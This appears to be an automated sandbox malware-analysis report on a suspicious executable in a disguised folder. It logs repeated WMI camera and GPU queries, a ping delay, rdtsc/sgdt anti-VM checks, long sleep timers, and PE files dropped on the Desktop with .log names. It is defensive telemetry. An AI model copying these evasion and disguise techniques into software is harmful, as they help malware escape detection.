                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                    Malware Analysis System Evasion

                                    barindex
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeMemory allocated: C50000 memory reserve | memory write watchJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeMemory allocated: 1ACC0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeMemory allocated: 1B260000 memory reserve | memory write watchJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF84904340F rdtsc 5_2_00007FF84904340F
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF849976398 sgdt fword ptr [eax]12_2_00007FF849976398
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 599719Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 599328Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 598969Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 598453Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 598297Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 598153Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 597984Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 597703Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 596656Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 596406Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 595875Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 595469Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 595063Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 594844Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 594563Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 594188Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 593828Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 593313Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 592688Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 592391Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 592215Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 591953Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 591234Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 590734Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 590375Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 590016Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 589719Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 589297Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 588969Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 588616Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 588422Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 588121Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 587688Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 587341Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 587205Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 587078Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586953Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586844Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586714Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586609Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586500Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586359Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 586213Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585942Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585813Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585696Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585578Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585469Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585359Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585209Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 585078Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeThread delayed: delay time: 584969Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWindow / User API: threadDelayed 5789Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWindow / User API: threadDelayed 3773Jump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\hgxdViOd.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\YuFVHGXq.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\LVvPQgSP.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\rOQtFLTL.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\oitSpyyv.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\lWnUcfOW.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\IZCgKuwL.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\zFRrKozb.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\uwXRiYty.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\jaztMisT.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\VMyxesyD.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\WsSnlWTv.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\STjOtvME.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\NkZFHznt.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\bnUEsCJp.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\QzpNJrOH.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\RRtweJUq.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\dpGmOlNk.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\oVBKTOiM.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\gCMlaExJ.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\WJZFAsNx.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\JXdofuLG.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\yEUaDqnu.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeDropped PE file which has not been started: C:\Users\user\Desktop\zsYipEjs.logJump to dropped file
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeDropped PE file which has not been started: C:\Users\user\Desktop\BqwHRBKU.logJump to dropped file
